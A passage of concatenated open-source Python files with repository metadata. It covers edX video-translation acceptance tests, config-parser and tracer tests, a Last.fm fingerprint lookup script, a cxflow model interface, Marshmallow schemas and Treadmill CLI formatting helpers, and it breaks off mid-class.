self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_remove_works_wo_saving(self):
"""
Scenario: Translations removing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I see translations for "uk"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.assertEqual(self.video.translations(), ['uk'])
self.video.remove_translation('uk')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_clearing_works_w_saving(self):
"""
Scenario: Translations clearing works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
And video language menu has "uk, zh" translations
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And I click button "Clear"
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.video.click_button('translations_clear')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_clearing_works_wo_saving(self):
"""
Scenario: Translations clearing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I click button "Clear"
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.video.click_button('translations_clear')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_cannot_upload_sjson_translation(self):
"""
Scenario: User cannot upload translations in sjson format
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "uk" language code
And I try to upload transcript file "subs__Szu8hVDvgc.srt.sjson"
Then I see validation error "Only SRT files can be uploaded. Please select a file ending in .srt to upload."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('uk')
self.video.upload_asset('subs__Szu8hVDvgc.srt.sjson', asset_type='transcript')
error_msg = 'Only SRT files can be uploaded. Please select a file ending in .srt to upload.'
self.assertEqual(self.video.upload_status_message, error_msg)
def test_replace_translation_w_save(self):
"""
Scenario: User can easy replace the translation by another one w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_replace_translation_wo_save(self):
"""
Scenario: User can easy replace the translation by another one w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_translation_upload_remove_upload(self):
"""
Scenario: Upload "zh" file "A" -> Remove "zh" -> Upload "zh" file "B"
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
Then I remove translation for "zh" language code
And I upload transcript file "uk_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
self.video.upload_translation('uk_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_select_language_twice(self):
"""
Scenario: User cannot select the same language twice
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "zh" language code
And I click button "Add"
Then I cannot choose "zh" language code
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.assertEqual(self.video.translations(), [u'zh', u''])
def test_table_of_contents(self):
"""
Scenario: User can see Abkhazian (ab) language option at the first position
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|table |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "table, uk" translations
And I see video language with code "table" at position "0"
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'ab')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), [u'ab', u'uk'])
self.assertEqual(self.video.caption_languages.keys()[0], 'ab')
def test_upload_transcript_with_BOM(self):
"""
Scenario: User can upload transcript file with BOM(Byte Order Mark) in it.
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts_with_BOM.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "莎拉·佩林 (Sarah Palin)" text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts_with_BOM.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "莎拉·佩林 (Sarah Palin)".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_lines())
def test_simplified_and_traditional_chinese_transcripts_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "simplified_chinese.srt" for "zh_HANS" language code
And I save changes
Then when I view the video it does show the captions
And I see "在线学习是革" text in the captions
And I edit the component
And I open tab "Advanced"
And I upload transcript file "traditional_chinese.srt" for "zh_HANT" language code
And I save changes
Then when I view the video it does show the captions
And I see "在線學習是革" text in the captions
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
self._create_video_component()
langs_info = [
('zh_HANS', 'simplified_chinese.srt', '在线学习是革'),
('zh_HANT', 'traditional_chinese.srt', '在線學習是革')
]
for lang_code, lang_file, lang_text in langs_info:
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation(lang_file, lang_code)
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
# If there is only one language then there will be no subtitle/captions menu
if lang_code == 'zh_HANT':
self.video.select_language(lang_code)
unicode_text = lang_text.decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
|
IONISx/edx-platform
|
common/test/acceptance/tests/video/test_studio_video_editor.py
|
Python
|
agpl-3.0
| 24,711
|
"""
Tests for configuration file parsers, ...
"""
from ConfigParser import RawConfigParser
import io
import os
import textwrap
import pytest
from ardomino.conf import (process_conf_files,
find_configuration_files,
create_conf_parser)
@pytest.fixture
def conf_dir(tmpdir):
with open(str(tmpdir.join('food.ini')), 'w') as f:
f.write(textwrap.dedent("""
[food:Egg]
taste = Great
[food:Bacon]
taste = Delicious
[food:Spam]
taste = Sublime
"""))
with open(str(tmpdir.join('beverages.ini')), 'w') as f:
f.write(textwrap.dedent("""
[beverage:Coffee]
color = black
[beverage:Milk]
color = white
[beverage:Tea]
color = brown
"""))
with open(str(tmpdir.join('pets.ini')), 'w') as f:
f.write(textwrap.dedent("""
[pet:Cat]
says = Meow
[pet:Dog]
says = Bark
[pet:Snake]
says =
"""))
with open(str(tmpdir.join('not-a-conf-file.txt')), 'w') as f:
f.write(textwrap.dedent("""
[this-is:not]
what = a configuration file!
"""))
return tmpdir
def test_create_conf_parser(conf_dir):
conf_parser = create_conf_parser(str(conf_dir))
assert 'pet:Cat' in conf_parser.sections()
assert 'food:Bacon' in conf_parser.sections()
assert 'beverage:Coffee' in conf_parser.sections()
assert 'this-is:not' not in conf_parser.sections()
def test_find_configuration_files(conf_dir):
found = find_configuration_files(str(conf_dir))
assert sorted(found) == [
str(conf_dir.join(n))
for n in 'beverages.ini', 'food.ini', 'pets.ini'
]
def test_process_conf_files():
example_conf = textwrap.dedent("""
[food:Egg]
description = A nice round egg
[food:Spam]
description = Spam Spam Spam Spam Spam!
[person:JohnDoe]
first_name = John
last_name = Doe
""")
expected_result = {
'food': {
'Egg': {'description': 'A nice round egg'},
'Spam': {'description': 'Spam Spam Spam Spam Spam!'},
},
'person': {
'JohnDoe': {
'first_name': 'John',
'last_name': 'Doe',
}
}
}
conf_parser = RawConfigParser()
conf_parser.readfp(io.BytesIO(example_conf))
result = process_conf_files(conf_parser)
assert result == expected_result
pass
def test_process_conf_dir(conf_dir):
parser = create_conf_parser(str(conf_dir))
obj = process_conf_files(parser)
assert sorted(obj.keys()) == ['beverage', 'food', 'pet']
assert sorted(obj['beverage'].keys()) == ['Coffee', 'Milk', 'Tea']
assert sorted(obj['food'].keys()) == ['Bacon', 'Egg', 'Spam']
assert sorted(obj['pet'].keys()) == ['Cat', 'Dog', 'Snake']
assert obj['food']['Bacon'] == {'taste': 'Delicious'}
assert obj['food']['Spam'] == {'taste': 'Sublime'}
|
rshk/ardomino-api
|
ardomino/tests/test_configuration.py
|
Python
|
bsd-3-clause
| 3,008
|
#!/usr/bin/env python
"""A simple program for using pylastfp to fingerprint and look up
metadata for MP3 files. Usage:
$ python lastmatch.py [-m] mysterious_music.mp3
By default, the script uses Gstreamer to decode audio. The -m flag
makes it use MAD instead (which, of course, only works on MPEG audio
such as MP3). To use the script, of course, you'll need to have
either Gstreamer (and its Python bindings) or pymad installed.
"""
from __future__ import print_function
import sys
import os
# Just a little trickery to avoid importing the "lastfp" package that's
# in the source distribution, because it won't contain the built
# _fplib.so extension module. We need to import from the built verison,
# and this script is likely to be run from the distribution root.
for path in '', os.path.abspath(os.path.dirname(__file__)):
if path in sys.path:
sys.path.remove(path)
import lastfp
# This API key is specifically for this script, lastmatch.py. If you
# use pylastfp in your project, you'll want to generate your own. It's
# easy and free!
# http://last.fm/api/account
API_KEY = '7821ee9bf9937b7f94af2abecced8ddd'
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print("usage: python lastmatch.py [-m] mysterious_music.mp3 [...]")
sys.exit(1)
if args[0] == '-m':
match_func = lastfp.mad_match
args.pop(0)
else:
match_func = lastfp.gst_match
for path in args:
path = os.path.abspath(os.path.expanduser(path))
# Perform match.
try:
xml = match_func(API_KEY, path)
except lastfp.ExtractionError:
print('fingerprinting failed!')
sys.exit(1)
except lastfp.QueryError:
print('could not match fingerprint!')
sys.exit(1)
# Show results.
matches = lastfp.parse_metadata(xml)
for track in matches:
print('%f: %s - %s' % (track['rank'], track['artist'],
track['title']))
|
sampsyo/pylastfp
|
lastmatch.py
|
Python
|
lgpl-3.0
| 2,040
|
"""
This module contains the definition of a model trainable in **cxflow** framework.
"""
from abc import abstractmethod, ABCMeta
from typing import Iterable, Optional
from ..datasets import AbstractDataset, StreamWrapper
from ..types import Batch
class AbstractModel(metaclass=ABCMeta):
"""
Abstract machine learning model which exposes input and output names, run and save methods.
`AbstractModel` implementations are trainable with :py:class:`cxflow.MainLoop`.
"""
@abstractmethod
def __init__(self, dataset: Optional[AbstractDataset], log_dir: str, restore_from: Optional[str]=None, **kwargs):
"""
Model constructor interface.
Additional parameters (currently covered by ``**kwargs``) are passed
according to the configuration ``model`` section.
:param dataset: dataset object
:param log_dir: existing directory in which all output files should be stored
:param restore_from: information passed to the model constructor (backend-specific);
usually a directory in which the trained model is stored
:param kwargs: configuration section ``model``
"""
pass
@property
@abstractmethod
def input_names(self) -> Iterable[str]:
"""List of model input names."""
pass
@property
@abstractmethod
def output_names(self) -> Iterable[str]:
"""List of model output names."""
pass
@abstractmethod
def run(self, batch: Batch, train: bool, stream: StreamWrapper) -> Batch:
"""
Run feed-forward pass with the given batch and return the results as dict.
When ``train=True``, also update parameters.
:param batch: batch to be processed
:param train: ``True`` if this batch should be used for model update, ``False`` otherwise
:param stream: stream wrapper (useful for precise buffer management)
:return: results dict
"""
pass
@abstractmethod
def save(self, name_suffix: str) -> str:
"""
Save the model parameters with the given ``name_suffix``.
:param name_suffix: name suffix to be appended to the saved model
:return: path to the saved file/dir
"""
pass
@property
@abstractmethod
def restore_fallback(self) -> str:
"""
Return the fully-qualified name of the fallback restore class (e.g. ``module.submodule.BaseClass``).
When restoring a model, **cxflow** tries to use the fallback class if the construction of the model
object specified in `model` configuration section fails.
:return: fully-qualified name of the fallback restore class
"""
pass
|
Cognexa/cxflow
|
cxflow/models/abstract_model.py
|
Python
|
mit
| 2,738
|
from flask_marshmallow import Marshmallow
from models import Feature, Client, Area
ma = Marshmallow()
class ClientSchema(ma.ModelSchema):
class Meta:
model = Client
class AreaSchema(ma.ModelSchema):
class Meta:
model = Area
class FeatureSchema(ma.ModelSchema):
class Meta:
model = Feature
client_schema = ClientSchema()
clients_schema = ClientSchema(many=True)
area_schema = AreaSchema()
areas_schema = AreaSchema(many=True)
feature_schema = FeatureSchema()
features_schema = FeatureSchema(many=True)
|
yuriyarhipov/FeatureRequestApp
|
schemas.py
|
Python
|
mit
| 546
|
from pluggy._tracing import TagTracer
import pytest
from typing import List
@pytest.fixture
def rootlogger() -> TagTracer:
return TagTracer()
def test_simple(rootlogger: TagTracer) -> None:
log = rootlogger.get("pytest")
log("hello")
out: List[str] = []
rootlogger.setwriter(out.append)
log("world")
assert len(out) == 1
assert out[0] == "world [pytest]\n"
sublog = log.get("collection")
sublog("hello")
assert out[1] == "hello [pytest:collection]\n"
def test_indent(rootlogger: TagTracer) -> None:
log = rootlogger.get("1")
out = []
log.root.setwriter(lambda arg: out.append(arg))
log("hello")
log.root.indent += 1
log("line1")
log("line2")
log.root.indent += 1
log("line3")
log("line4")
log.root.indent -= 1
log("line5")
log.root.indent -= 1
log("last")
assert len(out) == 7
names = [x[: x.rfind(" [")] for x in out]
assert names == [
"hello",
" line1",
" line2",
" line3",
" line4",
" line5",
"last",
]
def test_readable_output_dictargs(rootlogger: TagTracer) -> None:
out = rootlogger._format_message(["test"], [1])
assert out == "1 [test]\n"
out2 = rootlogger._format_message(["test"], ["test", {"a": 1}])
assert out2 == "test [test]\n a: 1\n"
def test_setprocessor(rootlogger: TagTracer) -> None:
log = rootlogger.get("1")
log2 = log.get("2")
assert log2.tags == tuple("12")
out = []
rootlogger.setprocessor(tuple("12"), lambda *args: out.append(args))
log("not seen")
log2("seen")
assert len(out) == 1
tags, args = out[0]
assert "1" in tags
assert "2" in tags
assert args == ("seen",)
l2 = []
rootlogger.setprocessor("1:2", lambda *args: l2.append(args))
log2("seen")
tags, args = l2[0]
assert args == ("seen",)
|
pytest-dev/pluggy
|
testing/test_tracer.py
|
Python
|
mit
| 1,900
|
"""Treadmill commaand line helpers.
"""
import codecs
import copy
import functools
import importlib
import json
import logging
import os
import pkgutil
import pkg_resources
import re
import sys
import tempfile
import traceback
import click
import prettytable
import yaml
from six.moves import configparser
from treadmill import context
from treadmill import utils
from treadmill import restclient
import collections
__path__ = pkgutil.extend_path(__path__, __name__)
EXIT_CODE_DEFAULT = 1
IPA_PASSWORD_RE = re.compile('.{8,}')
def init_logger(name):
"""Initialize logger."""
log_conf_file = pkg_resources.resource_stream(
'treadmill',
'/logging/{name}'.format(name=name)
)
try:
logging.config.fileConfig(
codecs.getreader('utf-8')(log_conf_file)
)
except configparser.Error:
with tempfile.NamedTemporaryFile(delete=False) as f:
traceback.print_exc(file=f)
click.echo('Error parsing log conf: {name}'.format(name=name),
err=True)
def make_multi_command(module_name, **click_args):
"""Make a Click multicommand from all submodules of the module."""
class MCommand(click.MultiCommand):
"""Treadmill CLI driver."""
def __init__(self, *args, **kwargs):
if kwargs and click_args:
kwargs.update(click_args)
click.MultiCommand.__init__(self, *args, **kwargs)
def list_commands(self, ctx):
climod = importlib.import_module(module_name)
commands = set(
[modulename for _loader, modulename, _ispkg
in pkgutil.iter_modules(climod.__path__)]
)
return sorted([cmd.replace('_', '-') for cmd in commands])
def get_command(self, ctx, name):
try:
full_name = '.'.join([module_name, name.replace('-', '_')])
mod = importlib.import_module(full_name)
return mod.init()
except Exception: # pylint: disable=W0703
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo(
'Unable to load plugin: %s [ %s ]' % (name, f.name),
err=True)
return
return MCommand
def _read_password(value):
"""Heuristic to either read the password from file or return the value."""
if os.path.exists(value):
with open(value) as f:
return f.read().strip()
else:
return value
def handle_context_opt(ctx, param, value):
"""Handle eager CLI options to configure context.
The eager options are evaluated directly during parsing phase, and can
affect other options parsing (like required/not).
The only side effect of consuming these options are setting attributes
of the global context.
"""
def parse_dns_server(dns_server):
"""Parse dns server string"""
if ':' in dns_server:
hosts_port = dns_server.split(':')
return (hosts_port[0].split(','), int(hosts_port[1]))
else:
return (dns_server.split(','), None)
if not value or ctx.resilient_parsing:
return None
if value == '-':
return None
opt = param.name
if opt == 'cell':
context.GLOBAL.cell = value
elif opt == 'dns_domain':
context.GLOBAL.dns_domain = value
elif opt == 'dns_server':
context.GLOBAL.dns_server = parse_dns_server(value)
elif opt == 'ldap':
context.GLOBAL.ldap.url = value
elif opt == 'ldap_suffix':
context.GLOBAL.ldap.ldap_suffix = value
elif opt == 'ldap_user':
context.GLOBAL.ldap.user = value
elif opt == 'ldap_pwd':
context.GLOBAL.ldap.password = _read_password(value)
elif opt == 'zookeeper':
context.GLOBAL.zk.url = value
else:
raise click.UsageError('Invalid option: %s' % param.name)
return value
class _CommaSepList(click.ParamType):
"""Custom input type for comma separated values."""
name = 'list'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return []
try:
return value.split(',')
except AttributeError:
self.fail('%s is not a comma separated list' % value, param, ctx)
LIST = _CommaSepList()
class _KeyValuePairs(click.ParamType):
"""Custom input type for key/value pairs."""
name = 'key/value pairs'
def convert(self, value, param, ctx):
"""Convert command line argument to list."""
if value is None:
return {}
items = re.split(r'(\w+=)', value)
items.pop(0)
keys = [key.rstrip('=') for key in items[0::2]]
values = [value.rstrip(',') for value in items[1::2]]
return dict(zip(keys, values))
DICT = _KeyValuePairs()
def validate_memory(_ctx, _param, value):
"""Validate memory string."""
if value is None:
return
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Memory format: nnn[K|M|G].')
return value
def validate_disk(_ctx, _param, value):
"""Validate disk string."""
if value is None:
return
if not re.search(r'\d+[KkMmGg]$', value):
raise click.BadParameter('Disk format: nnn[K|M|Gyy].')
return value
def validate_cpu(_ctx, _param, value):
"""Validate cpu string."""
if value is None:
return
if not re.search(r'\d+%$', value):
raise click.BadParameter('CPU format: nnn%.')
return value
def wrap_words(words, length, sep=',', newline='\n'):
"""Join words by sep, no more than count in each line."""
lines = []
line = []
cur_length = 0
while True:
if not words:
lines.append(line)
break
if cur_length + len(line) > length:
lines.append(line)
cur_length = 0
line = []
word = words.pop(0)
cur_length += len(word)
line.append(word)
return newline.join([sep.join(line) for line in lines])
def make_wrap_words(length, sep=','):
"""Returng wrap words function."""
return lambda words: wrap_words(words, length, sep)
def _make_table(columns, header=False):
"""Make a table object for output."""
table = prettytable.PrettyTable(columns)
for col in columns:
table.align[col] = 'l'
table.set_style(prettytable.PLAIN_COLUMNS)
# For some reason, headers must be disable after set_style.
table.header = header
table.left_padding_width = 0
table.right_padding_width = 2
return table
def _cell(item, column, key, fmt):
"""Constructs a value in table cell."""
if key is None:
key = column
if isinstance(key, str):
keys = [key]
else:
keys = key
raw_value = None
while keys:
key = keys.pop(0)
if key in item:
raw_value = item[key]
break
if isinstance(fmt, collections.Callable):
try:
value = fmt(raw_value)
except Exception: # pylint: disable=W0703
if raw_value is None:
value = '-'
else:
raise
else:
if raw_value is None:
value = '-'
else:
if isinstance(raw_value, list):
value = ','.join(map(str, raw_value))
else:
value = raw_value
return value
def dict_to_table(item, schema):
"""Display object as table."""
table = _make_table(['key', '', 'value'], header=False)
for column, key, fmt in schema:
value = _cell(item, column, key, fmt)
table.add_row([column, ':', value])
return table
def make_dict_to_table(schema):
"""Return dict to table function given schema."""
return lambda item: dict_to_table(item, schema)
def list_to_table(items, schema, header=True):
"""Display list of items as table."""
columns = [column for column, _, _ in schema]
table = _make_table(columns, header=header)
if items is None:
items = []
for item in items:
row = []
for column, key, fmt in schema:
row.append(_cell(item, column, key, fmt))
table.add_row(row)
return table
def make_list_to_table(schema, header=True):
"""Return list to table function given schema."""
return lambda items: list_to_table(items, schema, header)
def combine(list_of_values, sep=','):
"""Split and sum list of sep string into one list."""
combined = sum(
[str(values).split(sep) for values in list(list_of_values)],
[]
)
if combined == ['-']:
combined = None
return combined
def out(string, *args):
"""Print to stdout."""
if args:
string = string % args
click.echo(string)
def handle_exceptions(exclist):
"""Decorator that will handle exceptions and output friendly messages."""
def wrap(f):
"""Returns decorator that wraps/handles exceptions."""
exclist_copy = copy.copy(exclist)
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
"""Wrapped function."""
if not exclist_copy:
f(*args, **kwargs)
else:
exc, handler = exclist_copy.pop(0)
try:
wrapped_f(*args, **kwargs)
except exc as err:
if isinstance(handler, str):
click.echo(handler, err=True)
elif handler is None:
click.echo(str(err), err=True)
else:
click.echo(handler(err), err=True)
sys.exit(EXIT_CODE_DEFAULT)
@functools.wraps(f)
def _handle_any(*args, **kwargs):
"""Default exception handler."""
try:
return wrapped_f(*args, **kwargs)
except Exception as unhandled: # pylint: disable=W0703
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
traceback.print_exc(file=f)
click.echo('Error: %s [ %s ]' % (unhandled, f.name),
err=True)
sys.exit(EXIT_CODE_DEFAULT)
return _handle_any
return wrap
OUTPUT_FORMAT = 'pretty'
def make_formatter(pretty_formatter):
"""Makes a formatter."""
def _format(item, how=None):
"""Formats the object given global format setting."""
if how is None:
how = OUTPUT_FORMAT
formatters = {
'json': json.dumps,
'yaml': utils.dump_yaml,
}
if pretty_formatter is not None:
try:
formatters['pretty'] = pretty_formatter.format
except AttributeError:
formatters['pretty'] = pretty_formatter
if how in formatters:
return formatters[how](item)
else:
return str(item)
return _format
class AppPrettyFormatter(object):
"""Pretty table app formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
services_restart_tbl = make_dict_to_table([
('limit', None, None),
('interval', None, None),
])
services_tbl = make_list_to_table([
('name', None, None),
('root', None, None),
('restart', None, services_restart_tbl),
(
'command',
None,
lambda cmd: wrap_words(cmd.split(), 40, ' ', '\n ')
),
])
endpoints_tbl = make_list_to_table([
('name', None, None),
('port', None, None),
('proto', None, lambda proto: proto if proto else 'tcp'),
('type', None, None),
])
environ_tbl = make_list_to_table([
('name', None, None),
('value', None, None),
])
vring_rules_tbl = make_list_to_table([
('pattern', None, None),
('endpoints', None, ','.join),
])
vring_tbl = make_dict_to_table([
('cells', None, ','.join),
('rules', None, vring_rules_tbl),
])
ephemeral_tbl = make_dict_to_table([
('tcp', None, None),
('udp', None, None),
])
schema = [
('name', '_id', None),
('memory', None, None),
('cpu', None, None),
('disk', None, None),
('tickets', None, None),
('features', None, None),
('identity-group', 'identity_group', None),
('schedule-once', 'schedule_once', None),
('shared-ip', 'shared_ip', None),
('ephemeral-ports', 'ephemeral_ports', ephemeral_tbl),
('services', None, services_tbl),
('endpoints', None, endpoints_tbl),
('environ', None, environ_tbl),
('vring', None, vring_tbl),
('passthrough', None, '\n'.join),
('data-retention-timeout', 'data_retention_timeout', None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table([
('name', '_id', None),
('memory', None, None),
('cpu', None, None),
('disk', None, None),
('tickets', None, None),
('features', None, None),
])
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class AppMonitorPrettyFormatter(object):
"""Pretty table app monitor formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [('monitor', '_id', None),
('count', 'count', None)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class IdentityGroupPrettyFormatter(object):
"""Pretty table identity group formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [('identity-group', '_id', None),
('count', 'count', None)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class ServerPrettyFormatter(object):
"""Pretty table server formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('name', '_id', None),
('cell', None, None),
('traits', None, None),
('partition', None, None),
('data', None, None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class ServerNodePrettyFormatter(object):
"""Pretty table server (scheduler) node formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [('name', None, None),
('memory', None, None),
('cpu', None, None),
('disk', None, None),
('partition', None, None),
('parent', None, None),
('traits', None, None)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class LdapSchemaPrettyFormatter(object):
"""Pretty table ldap schema formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
attr_tbl = make_list_to_table([
('name', None, None),
('desc', None, None),
('type', None, None),
('ignore_case', None, None),
])
objcls_tbl = make_list_to_table([
('name', None, None),
('desc', None, None),
('must', None, None),
('may', None, make_wrap_words(40)),
])
schema_tbl = make_dict_to_table([
('dn', None, None),
('attributes', 'attributeTypes', attr_tbl),
('objects', 'objectClasses', objcls_tbl),
])
return schema_tbl(item)
class BucketPrettyFormatter(object):
"""Pretty table bucket formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [('name', None, None),
('parent', None, None),
('traits', None, None)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class CellPrettyFormatter(object):
"""Pretty table cell formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
masters_tbl = make_list_to_table([
('idx', None, None),
('hostname', None, None),
('zk-client-port', None, None),
('zk-jmx-port', None, None),
('zk-followers-port', None, None),
('zk-election-port', None, None),
])
partitions_tbl = make_list_to_table([
('id', 'partition', None),
('cpu', None, None),
('disk', None, None),
('memory', None, None),
('down threshold', 'down-threshold', None),
])
schema = [
('name', '_id', None),
('version', None, None),
('root', None, None),
('username', None, None),
('location', None, None),
('archive-server', None, None),
('archive-username', None, None),
('ssq-namespace', None, None),
('masters', None, masters_tbl),
('partitions', None, partitions_tbl),
('data', None, yaml.dump),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table([
('name', '_id', None),
('location', None, None),
('version', None, None),
('username', None, None),
('root', None, None),
])
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class DNSPrettyFormatter(object):
"""Pretty table critical DNS formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [('name', '_id', None),
('location', None, None),
('servers', 'server', '\n'.join),
('rest-servers', 'rest-server', '\n'.join),
('zkurl', None, None),
('fqdn', None, None),
('ttl', None, None),
('nameservers', None, '\n'.join)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table([
('name', '_id', None),
('location', None, None),
('fqdn', None, None),
('servers', 'server', ','.join),
])
if isinstance(item, list):
return format_list(item)
return format_item(item)
class AppGroupPrettyFormatter(object):
"""Pretty table App Groups formatter."""
@staticmethod
def format(item):
